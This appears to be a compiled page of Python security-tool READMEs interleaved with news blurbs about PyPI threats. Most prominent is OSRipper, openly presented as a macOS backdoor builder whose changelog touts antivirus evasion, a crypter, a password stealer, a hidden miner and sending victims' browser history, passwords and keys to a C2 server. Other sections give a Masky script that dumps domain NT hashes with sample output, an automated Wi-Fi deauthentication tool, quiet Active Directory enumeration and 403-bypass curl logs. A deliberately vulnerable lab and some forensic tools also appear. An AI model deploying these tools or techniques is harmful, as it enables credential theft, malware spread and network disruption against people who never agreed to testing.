
You need Python. If you do not wish to install Python, you can download a compiled release. The Python dependencies are specified in the requirements.txt file.

Since version 1.4 you will also need Metasploit installed and on your PATH so that it can handle the Meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Just run:

sudo python3 main.py

Contributing

Please feel free to fork and open pull requests. Suggestions/criticism are appreciated as well.

Roadmap

v0.1

  • ✅Get down detection to 0/26 on antiscan.me
  • ✅Add Changelog
  • ✅Daemonise Backdoor
  • ✅Add Crypter
  • ✅Add More Backdoor templates
  • ✅Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • ✅Add AntiVM
  • [] Implement tor hidden services
  • ✅Add Logger
  • ✅Add Password stealer
  • [] Add KeyLogger
  • ✅Add some new evasion options
  • ✅Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open an issue and I'll make sure to get back to you.

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the target and send it to the C2 server over sockets. This includes information like browser history, passwords, system information and keys.
  • 0.1.6

    • Process will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the process invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here, but my finances are not looking good right now. If you appreciate my work, I would really be happy about any donation. You do NOT have to; this is solely optional.

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



15-Year-Old Unpatched Python Vulnerability Potentially Affects Over 350,000 Projects

As many as 350,000 open source projects are believed to be potentially vulnerable to exploitation as a result of a security flaw in a Python module that has remained unpatched for 15 years. The open source repositories span a number of industry verticals, such as software development, artificial intelligence/machine learning, web development, media, security, and IT management. The shortcoming,

Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL


Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.


Use case?

I wrote Aced simply because I wanted a more targeted approach to querying ACLs. BloodHound is fantastic; however, it is extremely noisy. BloodHound collects all the things, while Aced collects a single thing, giving the operator more control over how and what data is collected. There's a phrase the Navy SEALs use: "slow is smooth and smooth is fast," and that's the approach I tried to take with Aced. The chance of detection is reduced by querying only for what LDAP wants to tell you and by not performing what are known as "expensive LDAP queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional BloodHound integration, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.

References

Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm

Usage

└─# python3 aced.py -h                             


_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0

Parse and log a target principal's DACL.
@garrfoster

usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target

Tool to enumerate a single target's DACL in Active Directory

optional arguments:
-h, --help show this help message and exit

Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS instead of LDAP

Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.

Demo

In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.
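The demo screenshots are omitted in this extract, but based on the target syntax from the help output above, an equivalent invocation would look something like the following sketch (the DC hostname and password are hypothetical placeholders):

python3 aced.py -ldaps corp.local/lowpriv:'P@ssw0rd!'@dc01.corp.local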


And here's how that data looks when transformed by bofhound and ingested into BloodHound.




JuiceLedger Hackers Behind the Recent Phishing Attacks Against PyPI Users

More details have emerged about the operators behind the first-known phishing campaign specifically aimed at the Python Package Index (PyPI), the official third-party software repository for the programming language. Connecting it to a threat actor tracked as JuiceLedger, cybersecurity firm SentinelOne, along with Checkmarx, described the group as a relatively new entity that surfaced in early

Warning: PyPI Feature Executes Code Automatically After Python Package Download

In another finding that could expose developers to increased risk of a supply chain attack, it has emerged that nearly one-third of the packages in PyPI, the Python Package Index, trigger automatic code execution upon downloading them. "A worrying feature in pip/PyPI allows code to automatically run when developers are merely downloading a package," Checkmarx researcher Yehuda Gelb said in a

Autodeauth - A Tool Built To Automatically Deauth Local Networks


A tool built to automatically deauth local networks

Setup

$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed

use sudo autodeauth or systemctl start autodeauth

To edit the service settings, edit the service file: /etc/systemd/system/autodeauth.service

Options

$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|

usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]

Auto Deauth Tool

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of networks ssids/mac addresses to avoid (Comma separated)
--whitelist WHITELIST, -w WHITELIST
List of networks ssids/mac addresses to target (Comma separated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)

Usage

After running the setup you are able to run the script by using autodeauth from any directory

Command line

Networks with spaces can be represented using their mac addresses

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000

Service

$ sudo systemctl start autodeauth

Loot and Log files

Loot

When a network is detected and fits the whitelist/blacklist criteria, its network information is saved as a JSON file in /var/log/autodeauth/

{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}
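
Since each capture is a standalone JSON file in /var/log/autodeauth/, a few lines of Python can summarize the loot. This helper is hypothetical (not part of autodeauth) and only assumes the directory and fields shown above:

import glob
import json

# Summarize networks captured by autodeauth (loot dir from above)
for path in glob.glob("/var/log/autodeauth/*.json"):
    with open(path) as f:
        net = json.load(f)
    print(f"{net['ssid']} ({net['mac_address']}) "
          f"channel={net['channel']} signal={net['signal']} dBm")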

Log File

$ cat /var/log/autodeauth/log               
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up

Edit Service Config

To change the settings of the autodeauth service, edit the file /etc/systemd/system/autodeauth.service.
Let's say you wanted the following config to be set up as a service:

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service

Then you would change the ExecStart line to

ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000


Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory


Masky is a Python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX certificates, NT hashes and TGTs on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via Kerberos & NT hash retrieval via PKINIT). A blog post was published to detail the implemented techniques and how Masky works.

Masky's source code is largely based on the amazing Certify and Certipy tools. I really thank their authors for their research regarding offensive exploitation techniques against ADCS (see the Acknowledgments section).


Installation

The Masky python3 library and its associated CLI can simply be installed via the public PyPI repository as follows:

pip install masky

The Masky agent executable is already included within the PyPi package.

Moreover, if you need to modify the agent, the C# code can be recompiled via the Visual Studio project located in agent/Masky.sln. It requires .NET Framework 4 to build.

Usage

Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or red team activities.

For both usages, you first need to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated rollback of its initial ImagePath value, an unexpected error during Masky's runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such an unwanted stop.

Command line

The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution collects the NT hashes, CCACHE and PFX of 3 distinct domain users from the sec.lab testing domain.

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to authenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exist)
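
Tying the help text together, a complete run might look like the following sketch (assuming the masky entry point installed by pip; the CA, domain, credentials and addresses are placeholder values reused from the library example below):

masky -d sec.lab -u askywalker -p 'Password123!' -ca 'srv-01.sec.lab\sec-SRV-01-CA' -dc-ip 192.168.23.148 192.168.23.130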

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
    # Define the authentication parameters
    ca = "srv-01.sec.lab\\sec-SRV-01-CA"
    dc_ip = "192.168.23.148"
    domain = "sec.lab"
    user = "askywalker"
    password = getpass()

    # Create a Masky instance with these credentials
    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

    # Set a target and run Masky against it
    target = "192.168.23.130"
    rslts = m.run(target)

    # Check if Masky successfully hijacked at least one user session
    # or if an unexpected error occurred
    if not rslts:
        return False

    # Loop on the results object to display hijacked users and retrieve their NT hashes
    print(f"Results from hostname: {rslts.hostname}")
    for user in rslts.users:
        print(f"\t - {user.domain}\\{user.name} - {user.nt_hash}")

    return True


if __name__ == "__main__":
    dump_nt_hashes()

Its execution generates the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Acknowledgments



Erlik - Vulnerable Soap Service


Erlik - Vulnerable Soap Service

Tested - Kali 2022.1

Description

It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • LFI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization

Installation

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service

cd Vulnerable-Soap-Service

sudo pip3 install -r requirements.txt

Usage

sudo python3 vulnerable_soap.py

Exploiting Vulnerabilities

LFI

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py

SQL Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py

Information Disclosure

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py

Command Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py

Brute Force

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py

Deserialization

Code:

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py



PyPI Repository Warns Python Project Maintainers About Ongoing Phishing Attacks

The Python Package Index, PyPI, on Wednesday sounded the alarm about an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates to legitimate packages. "This is the first known phishing attack against PyPI," the maintainers of the official third-party software repository said in a series of tweets. The social engineering attack entails sending

XCSSET Malware Updates with Python 3 to Target macOS Monterey Users

The operators of the XCSSET macOS malware have upped the stakes by making iterative improvements that add support for macOS Monterey by upgrading its source code components to Python 3. "The malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022," SentinelOne researchers

10 Credential Stealing Python Libraries Found on PyPI Repository

In what's yet another instance of malicious packages creeping into public code repositories, 10 modules have been removed from the Python Package Index (PyPI) for their ability to harvest critical data points such as passwords and API tokens. The packages "install info-stealers that enable attackers to steal developer's private data and personal credentials," Israeli cybersecurity firm Check

Pict - Post-Infection Collection Toolkit


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without them.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second form consists of complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required: the path to a configuration file in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:
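
The example config did not survive this extract; the following reconstruction is sketched purely from the keys documented in the sections below (collection_dest, all_users, collectors, unused, settings, moduleSettings). The module and class names are placeholders, not the tool's actual module list:

{
    "collection_dest": "~/pict-data",
    "all_users": true,
    "collectors": {
        "browser": "BrowserCollector",
        "processes": "ProcessCollector"
    },
    "unused": {
        "example": "ExampleCollector"
    },
    "settings": {
        "keepLSData": false,
        "zipIt": true
    },
    "moduleSettings": {
        "browser": {
            "collectArtifacts": true
        }
    }
}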

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the superclass Collector.__init__() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collector class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
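
Putting these hooks together, a skeleton module might look like the sketch below. The module name, output filename, and artifact path are hypothetical, and the hook signatures simply follow the descriptions above; duplicate collectors/template.py for the authoritative starting point:

# collectors/mymodule.py -- hypothetical custom module
from collectors.collector import Collector


class MyCollector(Collector):
    def __init__(self, collectionPath, allUsers):
        # Let the base class set up its properties first
        super().__init__(collectionPath, allUsers)

    def printStartInfo(self):
        print("Collecting my custom data...")

    def applySettings(self, settingsDict):
        # Read any module-specific settings, then defer to the base class
        self.myOption = settingsDict.get("myOption", False)
        super().applySettings(settingsDict)

    def collect(self):
        # Write summary output inside the collection folder
        with open(f"{self.collectionPath}/mymodule.txt", "w") as out:
            out.write("example summary data\n")
        # Queue file artifacts; the base class copies them and keeps metadata
        self.pathsToCollect.append("/etc/hosts")
        super().collect()

It would then be registered in the configuration's collectors dictionary as "mymodule": "MyCollector".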

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd SilentHound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. username bob.dole might be 'bob dole'
-p PASSWORD, --password PASSWORD
LDAP password - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.
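
For illustration only (this is not SilentHound's code), the one-query-then-parse approach with python-ldap and an anonymous BIND looks roughly like this; the DC IP and base DN are placeholders:

import ldap

# One broad LDAP query against the DC; results are parsed/cached locally afterwards
conn = ldap.initialize("ldap://10.10.10.10")  # hypothetical Domain Controller IP
conn.set_option(ldap.OPT_REFERRALS, 0)
conn.simple_bind_s()  # anonymous BIND when no credentials are supplied

results = conn.search_s(
    "dc=acme,dc=com",      # base DN built from the domain argument
    ldap.SCOPE_SUBTREE,
    "(objectClass=*)",     # single query; filtering happens offline
)
print(f"Retrieved {len(results)} LDAP objects")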

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r-- 1 kali kali  122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali   60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali   89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali   66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali  529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.



To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "indicators of user activity," since recent modifications to them indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.
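
The walk-and-sort core is simple enough to sketch. The following is an illustrative reimplementation under the defaults described above (ignore list, chronological ordering), not modDetective's actual code:

import os

IGNORE = ("/proc", "/sys", "/run", "/snap", "/dev")  # "dynamic" dirs ignored by default

entries = []
for root, dirs, files in os.walk("/"):
    if root.startswith(IGNORE):
        dirs[:] = []  # do not descend into ignored trees
        continue
    for name in files:
        path = os.path.join(root, name)
        try:
            entries.append((os.path.getmtime(path), path))
        except OSError:
            pass  # unreadable or vanished files are skipped

# Order by modification time and print chronologically
for mtime, path in sorted(entries):
    print(mtime, path)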

Requirements

modDetective currently works only with Python 3; Python 2 compatibility will be completed shortly (hence the lack of f-strings). The standard library should be fine.



An Easier Way to Keep Old Python Code Healthy and Secure

Python has its pros and cons, but it's nonetheless used extensively. For example, Python is frequently used in data crunching tasks even when there are more appropriate languages to choose from. Why? Well, Python is relatively easy to learn. Someone with a science background can pick up Python much more quickly than, say, C. However, Python's inherent approachability also creates a couple of

Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page


Tool that tests MANY url bypasses to reach a 40X protected page.

If you wonder why this code is nothing but a dirty curl wrapper, here's why:

  • Most Python request libraries do url/path/parameter encoding/decoding, and I hate this.
  • If I submit raw chars, I want raw chars to be sent.
  • If I send a weird path, I want it weird, not normalized.

This is surprisingly hard to achieve in Python without losing all of the lib goodies like parsing, ssl/tls encapsulation and so on.
So, be like me, use curl as a backend, it's gonna be just fine.
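
To make the curl-as-backend idea concrete, here is a minimal sketch (not the tool's code) that shells out to curl with the same flags seen in the logs below, so the path reaches the server byte-for-byte unnormalized:

import subprocess

def raw_get(url: str) -> str:
    # --path-as-is stops curl from normalizing /../ and friends;
    # -g disables URL globbing so raw brackets/braces pass through
    cmd = ["curl", "-sS", "-kgi", "--path-as-is",
           "-w", "\\nStatus: %{http_code}, Length: %{size_download}", url]
    return subprocess.run(cmd, capture_output=True, text=True).stdout

print(raw_get("http://127.0.0.1/juicy_403_endpoint/%2e%2e/"))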


Setup for bypass.py

# Deps
sudo apt install -y bat curl virtualenv python3
# Tool
virtualenv -p python3 .py3
source .py3/bin/activate
pip install -r requirements.txt
./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"

Usage

Expected result
2022-05-10 15:54:03 work bup[738125] INFO === Config ===
2022-05-10 15:54:03 work bup[738125] INFO debug: False
2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list
2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:03 work bup[738125] INFO threads: 20
2022-05-10 15:54:03 work bup[738125] INFO timeout: 2
2022-05-10 15:54:03 work bup[738125] INFO headers: {}
2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls
2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com
2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list
2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'
